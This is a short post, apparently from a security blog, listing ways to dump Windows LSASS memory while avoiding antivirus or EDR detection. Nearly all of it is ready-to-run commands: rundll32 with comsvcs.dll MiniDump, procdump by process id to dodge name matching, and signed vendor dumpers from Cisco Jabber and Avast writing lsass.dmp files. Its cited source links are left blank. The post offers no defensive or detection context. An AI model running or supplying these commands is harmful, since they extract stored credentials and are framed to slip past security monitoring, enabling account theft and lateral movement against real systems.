Reading Time: < 1 minute

A few techniques to avoid AV or EDR detection

rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"

procdump <process id> instead of the word lsass

Signed Executable which can be used also

CiscoJabber : CiscoJabberProcessDump.exe (ps lsass).id c:\temp\lsass.dmp

See original article :

Avast Dumper : AvDump.exe –pid 676 –exception_ptr 0 –thread_id 0 –dump_level 1 –dump_file E:\lsass.dmp –min_interval 0

See orginal article :